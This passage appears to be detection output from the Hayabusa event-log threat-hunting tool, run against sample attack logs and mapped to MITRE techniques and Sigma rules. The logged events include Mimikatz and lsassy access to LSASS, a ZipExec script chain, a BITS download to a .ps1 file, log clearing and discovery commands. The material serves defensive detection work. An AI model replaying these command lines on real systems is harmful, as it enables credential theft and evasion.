""Suspend-Service"", ""Resume-Service"", ""Restart-Service"", ""Set-Service"", ""New-Service"", ""Set-Content"", ""Set-ItemProperty"", ""Set-WmiInstance"", ""Get-Transaction"", ""Start-Transaction"", ""Complete-Transaction"", ""Undo-Transaction"", ""Use-Transaction"", ""New-WebServiceProxy"", ""Get-HotFix"", ""Test-Connection"", ""Enable-ComputerRestore"", ""Disable-ComputerRestore"", ""Checkpoint-Computer"", ""Get-ComputerRestorePoint"", ""Restart-Computer"", ""Stop-Computer"", ""Restore-Computer"", ""Add-Computer"", ""Remove-Computer"", ""Test-ComputerSecureChannel"", ""Reset-ComputerMachinePassword"", ""Rename-Computer"", ""Get-ControlPanelItem"", ""Show-ControlPanelItem"") }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.427 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""lsass""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.427 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""rundll32""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:03.398 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.523 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.549 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination C:\Users\bits.ps1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Join-Path): ""Join-Path"" ParameterBinding(Join-Path): name=""Path""; value=""C:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer"" ParameterBinding(Join-Path): name=""ChildPath""; value=""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""{8FA5064B-8479-4c5c-86EA-0D311FE48875}"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""1.0.0.0"" PowerShellVersion=""2.0"" CLRVersion=""2.0"" NestedModules=""Microsoft.BackgroundIntelligentTransfer.Management"" FormatsToProcess=""BitsTransfer.Format.ps1xml"" RequiredAssemblies=Join-Path $psScriptRoot ""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll"" CmdletsToExport=""Add-BitsFile"",""Complete-BitsTransfer"",""Get-BitsTransfer"",""Remove-BitsTransfer"",""Resume-BitsTransfer"",""Set-BitsTransfer"",""Start-BitsTransfer"",""Suspend-BitsTransfer"" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-BitsTransfer): ""Start-BitsTransfer"" ParameterBinding(Start-BitsTransfer): name=""Priority""; value=""foreground"" ParameterBinding(Start-BitsTransfer): name=""Source""; value=""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md"" ParameterBinding(Start-BitsTransfer): name=""Destination""; value=""C:\Users\bits.ps1""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.100 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx 2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx 2021-10-22 22:39:50.927 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx 2021-10-22 22:39:55.502 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx 2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx 2021-10-22 23:02:11.902 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx 2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx 2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx 2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx 2021-10-25 16:23:05.426 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallProfile,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.457 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ ModuleVersion = '2.0.0.0' FormatsToProcess = 'NetSecurity.formats.ps1xml' TypesToProcess = 'NetSecurity.types.ps1xml' NestedModules = @( ""Microsoft.Windows.Firewall.Commands.dll"", ""NetFirewallRule.cmdletDefinition.cdxml"", ""NetIPsecRule.cmdletDefinition.cdxml"", ""NetIPsecMainModeRule.cmdletDefinition.cdxml"", ""NetFirewallAddressFilter.cmdletDefinition.cdxml"", ""NetFirewallApplicationFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml"", ""NetFirewallSecurityFilter.cmdletDefinition.cdxml"", ""NetFirewallPortFilter.cmdletDefinition.cdxml"", ""NetFirewallServiceFilter.cmdletDefinition.cdxml"", ""NetIPsecPhase1AuthSet.cmdletDefinition.cdxml"", ""NetIPsecPhase2AuthSet.cmdletDefinition.cdxml"", ""NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml"", ""NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml"", ""NetFirewallProfile.cmdletDefinition.cdxml"", ""NetIPsecPolicyChange.cmdletDefinition.cdxml"", ""NetIPsecDospSetting.cmdletDefinition.cdxml"", ""NetIPsecIdentity.cmdletDefinition.cdxml"", ""NetIPsecMainModeSA.cmdletDefinition.cdxml"", ""NetIPsecQuickModeSA.cmdletDefinition.cdxml"", ""NetFirewallSetting.cmdletDefinition.cdxml"", ""NetGPO.cmdletDefinition.cdxml"" ) GUID = '{4B26FF51-7AEE-4731-9CF7-508B82532CBF}' Author = 'Microsoft Corporation' CompanyName = 'Microsoft Corporation' PowerShellVersion = '3.0' ClrVersion = '4.0' Copyright = '© Microsoft Corporation. All rights reserved.' HelpInfoUri = ""http://go.microsoft.com/fwlink/?linkid=285764"" FunctionsToExport = @( ""Copy-NetFirewallRule"", ""Copy-NetIPsecMainModeCryptoSet"", ""Copy-NetIPsecMainModeRule"", ""Copy-NetIPsecPhase1AuthSet"", ""Copy-NetIPsecPhase2AuthSet"", ""Copy-NetIPsecQuickModeCryptoSet"", ""Copy-NetIPsecRule"", ""Disable-NetFirewallRule"", ""Disable-NetIPsecMainModeRule"", ""Disable-NetIPsecRule"", ""Enable-NetFirewallRule"", ""Enable-NetIPsecMainModeRule"", ""Enable-NetIPsecRule"", ""Get-NetFirewallAddressFilter"", ""Get-NetFirewallApplicationFilter"", ""Get-NetFirewallInterfaceFilter"", ""Get-NetFirewallInterfaceTypeFilter"", ""Get-NetFirewallPortFilter"", ""Get-NetFirewallProfile"", ""Get-NetFirewallRule"", ""Get-NetFirewallSecurityFilter"", ""Get-NetFirewallServiceFilter"", ""Get-NetFirewallSetting"", ""Get-NetIPsecDospSetting"", ""Get-NetIPsecMainModeCryptoSet"", ""Get-NetIPsecMainModeRule"", ""Get-NetIPsecMainModeSA"", ""Get-NetIPsecPhase1AuthSet"", ""Get-NetIPsecPhase2AuthSet"", ""Get-NetIPsecQuickModeCryptoSet"", ""Get-NetIPsecQuickModeSA"", ""Get-NetIPsecRule"", ""New-NetFirewallRule"", ""New-NetIPsecDospSetting"", ""New-NetIPsecMainModeCryptoSet"", ""New-NetIPsecMainModeRule"", ""New-NetIPsecPhase1AuthSet"", ""New-NetIPsecPhase2AuthSet"", ""New-NetIPsecQuickModeCryptoSet"", ""New-NetIPsecRule"", ""Open-NetGPO"", ""Remove-NetFirewallRule"", ""Remove-NetIPsecDospSetting"", ""Remove-NetIPsecMainModeCryptoSet"", ""Remove-NetIPsecMainModeRule"", ""Remove-NetIPsecMainModeSA"", ""Remove-NetIPsecPhase1AuthSet"", ""Remove-NetIPsecPhase2AuthSet"", ""Remove-NetIPsecQuickModeCryptoSet"", ""Remove-NetIPsecQuickModeSA"", ""Remove-NetIPsecRule"", ""Rename-NetFirewallRule"", ""Rename-NetIPsecMainModeCryptoSet"", ""Rename-NetIPsecMainModeRule"", ""Rename-NetIPsecPhase1AuthSet"", ""Rename-NetIPsecPhase2AuthSet"", ""Rename-NetIPsecQuickModeCryptoSet"", ""Rename-NetIPsecRule"", ""Save-NetGPO"", ""Find-NetIPsecRule"", ""Set-NetFirewallAddressFilter"", ""Set-NetFirewallApplicationFilter"", ""Set-NetFirewallInterfaceFilter"", ""Set-NetFirewallInterfaceTypeFilter"", ""Set-NetFirewallPortFilter"", ""Set-NetFirewallProfile"", ""Set-NetFirewallRule"", ""Set-NetFirewallSecurityFilter"", ""Set-NetFirewallServiceFilter"", ""Set-NetFirewallSetting"", ""Set-NetIPsecDospSetting"", ""Set-NetIPsecMainModeCryptoSet"", ""Set-NetIPsecMainModeRule"", ""Set-NetIPsecPhase1AuthSet"", ""Set-NetIPsecPhase2AuthSet"", ""Set-NetIPsecQuickModeCryptoSet"", ""Set-NetIPsecRule"", ""Show-NetFirewallRule"", ""Show-NetIPsecRule"", ""Sync-NetIPsecRule"", ""Update-NetIPsecRule"" ) CmdletsToExport = @( ""Get-DAPolicyChange"", ""New-NetIPsecAuthProposal"", ""New-NetIPsecMainModeCryptoProposal"", ""New-NetIPsecQuickModeCryptoProposal"" ) AliasesToExport = @( ) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 